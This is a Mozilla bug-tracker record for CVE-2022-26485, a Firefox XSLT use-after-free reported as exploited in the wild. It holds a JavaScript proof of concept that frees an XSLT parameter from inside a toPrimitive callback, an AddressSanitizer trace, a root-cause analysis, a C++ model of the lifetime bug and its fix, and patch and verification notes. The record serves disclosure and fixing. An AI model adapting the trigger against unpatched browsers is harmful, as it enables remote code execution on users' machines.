Closed Bug 1758062 (CVE-2022-26485) Opened 2 years ago Closed 2 years ago

heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert [exploited in the wild]

Categories

(Core :: XSLT, defect)

Tracking

RESOLVED FIXED
99 Branch
Tracking Status
firefox-esr91 97+ fixed
firefox97 + fixed
firefox98 + fixed
firefox99 + fixed

People

(Reporter: m.cooolie, Assigned: peterv)

Details

(Keywords: csectype-uaf, sec-critical, Whiteboard: [adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?][sec-survey])

Attachments

(3 files)

#Summary
heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert [exploited in the wild]

#Type
Render RCE

#NOTE
We have evidence that the following bug is being exploited in the wild.

#CREDIT
wang gang&liu jialei&du sihang&huang yi&yang kang of 360 ATA

#MINIPOC

<script>			
var v1 = '<?xml version="1.0" encoding="utf-8" ?><root><e></e></root>';
var v2 = '<?xml version="1.0" encoding="utf-8"?>  <xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  xmlns:msxsl="urn:schemas-microsoft-com:xslt"   xmlns:exsl="http://exslt.org/common"  exclude-result-prefixes="msxsl">    <xsl:output method="xml" indent="yes"/> <xsl:param name="test00" />  <xsl:template match="/"> <xsl:value-of select="$test00" />  </xsl:template>    </xsl:stylesheet>';

var a1 = new DOMParser();
var a2 = new XSLTProcessor();
var a3 = a1.parseFromString(v2, "text/xml");
var a4 = a1.parseFromString(v1, "text/xml")
cb01 = {
	[Symbol.toPrimitive](hint) {
		console.log('cb01.toPrimitive')
		a2.removeParameter(null, 'test00');
		if (hint == 'string')
			return 'xxxxx';
		return true;
	}
};
a2.importStylesheet(a3);
a2.setParameter(null, 'test00', cb01);
console.log('bef transformToDocument')
a2.transformToDocument(a4);	
</script>				

#RCA

  1. Convert gets called by transformToDocument
  2. Convert uses JS::ToString to get the string value, which causes user JS to be called
  3. In the callback the attacker calls removeParameter to free the txVariable itself, causing the UAF

nsresult txVariable::Convert(nsIVariant* aValue, txAExprResult** aResult) {

	JS::Rooted<JS::Value> v(cx, JS::ObjectValue(*jsobj));
	JS::Rooted<JSString*> str(cx, JS::ToString(cx, v));		// <<[1] user JS runs here (step 2)
	NS_ENSURE_TRUE(str, NS_ERROR_FAILURE);

	nsAutoJSString value;
	NS_ENSURE_TRUE(value.init(cx, str), NS_ERROR_FAILURE);

	*aResult = new StringResult(value, nullptr);
	NS_ADDREF(*aResult);

#ASAN
=================================================================
==15704==ERROR: AddressSanitizer: heap-use-after-free on address 0x12233621cfa0 at pc 0x7ffe52dd81c0 bp 0x00cfa93f7820 sp 0x00cfa93f7868
WRITE of size 8 at 0x12233621cfa0 thread T0
    #0 0x7ffe52dd81bf in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361
    #1 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #2 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #3 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #4 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #5 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #6 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #7 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #8 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #9 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #10 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #11 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #12 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #13 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #14 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #15 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #16 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #17 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #18 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #19 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #20 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #21 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #22 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #23 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #24 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #25 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #26 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #27 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #28 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #29 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #30 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #31 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
    #32 0x7ffe4a006921 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'>::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #33 0x7ffe49fde593 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1173
    #34 0x7ffe49fef6ac in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #35 0x7ffe4b48986d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #36 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #37 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #38 0x7ffe5354606a in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #39 0x7ffe5372c29b in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:605
    #40 0x7ffe57dc68f4 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:878
    #41 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #42 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #43 0x7ffe57dc5e15 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
    #44 0x7ff685b9208c in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #45 0x7ff685b917ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #46 0x7ff685c8e757 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #47 0x7ffef2fe7033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #48 0x7ffef3ce2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)

0x12233621cfa0 is located 16 bytes inside of 24-byte region [0x12233621cf90,0x12233621cfa8)
freed by thread T0 here:
    #0 0x7ffebc467cdb in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ffe52ddd54b in txVariable::~txVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:199
    #2 0x7ffe52dd4309 in txMozillaXSLTProcessor::RemoveParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:964
    #3 0x7ffe4f61aaa9 in mozilla::dom::XSLTProcessor_Binding::removeParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:367
    #4 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #5 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #6 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #7 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #8 0x7ffe580b4b13 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:544
    #9 0x7ffe580b772e in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:589
    #10 0x7ffe5841488f in js::ToPrimitiveSlow /builds/worker/checkouts/gecko/js/src/vm/JSObject.cpp:2402
    #11 0x7ffe58778172 in js::ToStringSlow<js::CanGC> /builds/worker/checkouts/gecko/js/src/vm/StringType.cpp:2185
    #12 0x7ffe52dd7593 in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1355
    #13 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #14 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #15 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #16 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #17 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #18 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #19 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #20 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #21 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #22 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #23 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #24 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #25 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #26 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #27 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515

previously allocated by thread T0 here:
    #0 0x7ffebc467deb in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffec314134d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffe52dd21d0 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:920
    #3 0x7ffe52dd5ce7 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1210
    #4 0x7ffe4f61948b in mozilla::dom::XSLTProcessor_Binding::setParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:263
    #5 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #6 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #7 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #8 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #9 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #10 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #11 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #12 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #13 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #14 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #15 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #16 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #17 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #18 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #19 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #20 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #21 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #22 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #23 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #24 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #25 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #26 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #27 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert
==15704==ABORTING
Flags: sec-bounty?

[Tracking Requested - why for this release]:
0-day being exploited in the wild

Group: firefox-core-security → dom-core-security
Component: Security → XSLT
Product: Firefox → Core
Assignee: nobody → peterv
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true

Comment on attachment 9266495 [details]
Bug 1758062 - Convert parameters upfront. r?smaug!

Security Approval Request

  • How easily could an exploit be constructed based on the patch?: I don't think it's very hard to figure out, though not trivial either.
  • Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: No
  • Which older supported branches are affected by this flaw?: All
  • If not all supported branches, which bug introduced the flaw?: None
  • Do you have backports for the affected branches?: No
  • If not, how different, hard to create, and risky will they be?: Should apply as-is or with minor merging.
  • How likely is this patch to cause regressions; how much testing does it need?: The patch does cause a change in behaviour for parameters added to an XSLT processor: they are now converted at the point where they are added as opposed to when they are used. This behaviour is actually more reliable and this feature is probably not used a lot and even then it would be odd to rely on the old behaviour. So I'm not too worried about regressions.
Attachment #9266495 - Flags: sec-approval?
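
The lifetime problem from the RCA in comment 0 and the behaviour change described in the approval request above, as a self-contained C++ model added here (not Gecko code and not the landed patch). `Processor`, `Param`, `ScriptValue`, `Outcome` and `runScenario` are hypothetical names, and a `weak_ptr` stands in for the raw pointer so the freed state is reported instead of dereferenced.

```cpp
#include <functional>
#include <map>
#include <memory>
#include <string>

// Model only: hypothetical names, not Gecko code. ScriptValue stands in for a
// JS object whose string conversion runs page script (Symbol.toPrimitive).
using ScriptValue = std::function<std::string()>;
struct Param { ScriptValue raw; std::string converted; bool ready = false; };
struct Outcome {
    std::string value;
    bool freedDuringConvert;    // where raw-pointer code would touch freed memory
    int scriptRunsInTransform;  // conversions triggered while transforming
};

class Processor {
    std::map<std::string, std::shared_ptr<Param>> params_;
public:
    // Lazy (pre-fix shape): keep the raw value, convert on first use.
    void setParameterLazy(const std::string& name, ScriptValue v) {
        auto p = std::make_shared<Param>();
        p->raw = std::move(v);
        params_[name] = p;
    }
    // Eager (shape of the fix): script runs before the parameter is stored, so
    // a re-entrant call cannot invalidate anything the engine is holding.
    void setParameterEager(const std::string& name, const ScriptValue& v) {
        auto p = std::make_shared<Param>();
        p->converted = v();
        p->ready = true;
        params_[name] = p;
    }
    void removeParameter(const std::string& name) { params_.erase(name); }
    Outcome transform(const std::string& name) {
        Outcome out{"", false, 0};
        auto it = params_.find(name);
        if (it == params_.end()) return out;
        std::weak_ptr<Param> watch = it->second;  // observes lifetime only
        if (!it->second->ready) {
            ScriptValue cb = it->second->raw;  // copy: callable must outlive a removal
            std::string s = cb();              // page script runs here
            ++out.scriptRunsInTransform;
            auto alive = watch.lock();
            if (!alive) {  // owner dropped the object inside the callback
                out.freedDuringConvert = true;
                return out;
            }
            alive->converted = s;
            alive->ready = true;
        }
        out.value = watch.lock()->converted;
        return out;
    }
};

// Constructed scenario mirroring the report: the conversion hook removes the
// parameter it belongs to, then returns a string.
Outcome runScenario(bool eager) {
    Processor proc;
    ScriptValue hook = [&proc] { proc.removeParameter("test00"); return std::string("xxxxx"); };
    if (eager) proc.setParameterEager("test00", hook);
    else proc.setParameterLazy("test00", hook);
    return proc.transform("test00");
}
```

In the lazy scenario the parameter object is gone by the time conversion returns; in the eager scenario no script runs inside `transform`, so there is no window in which the object can be removed while in use.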

Comment on attachment 9266495 [details]
Bug 1758062 - Convert parameters upfront. r?smaug!

Approved to land

Attachment #9266495 - Flags: sec-approval? → sec-approval+

Comment on attachment 9266495 [details]
Bug 1758062 - Convert parameters upfront. r?smaug!

Adding branch approvals to go with Tom's sec-approval.

Attachment #9266495 - Flags: approval-mozilla-release+
Attachment #9266495 - Flags: approval-mozilla-esr91+

And pushed to Beta for DevEdition 98.0b10.
https://hg.mozilla.org/releases/mozilla-beta/rev/cd1334289183

Summary: heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert[exploited in th wild] → heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert [exploited in the wild]
See Also: → CVE-2022-26486

Is there any way QA can verify this?

(In reply to Tracy Walker [:tracy] from comment #10)
> Is there any way QA can verify this?

There's a test case in the "#MINIPOC" section in comment 0. However, it doesn't crash for me when I run it in a normal debug build on OSX. Maybe it could be verified in an AddressSanitizer build at least?

Ok, given that, QA will trust engineering to verify.

Oh, there is actually a Mochitest in the second patch. You could check that it actually passes on the builds, as it isn't being landed.

Flags: needinfo?(twalker)
Alias: CVE-2022-26485

pdehaan was able to verify the fix via the test. Thank you.

Flags: needinfo?(twalker)
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?]
Flags: sec-bounty? → sec-bounty+

As part of a security bug pattern analysis, we are requesting your help with a high level analysis of this bug. It is our hope to develop static analysis (or potentially runtime/dynamic analysis) in the future to identify classes of bugs.

Please visit this google form to reply.

Flags: needinfo?(peterv)
Whiteboard: [adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?] → [adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?][sec-survey]
Group: core-security-release

Google TAG's blog post from November 2022 mentions this bug as having potentially been exploited even earlier. See the text starting with "For remote code execution it exploits CVE-2022-26485, a use after free vulnerability in the XSLT processor that was reported in March 2022 as being exploited in the wild.".

Flags: needinfo?(peterv)
Pushed by pvanderbeken@mozilla.com:
https://hg.mozilla.org/integration/autoland/rev/f3f05ab2bd52
Convert parameters upfront - testcase. r=smaug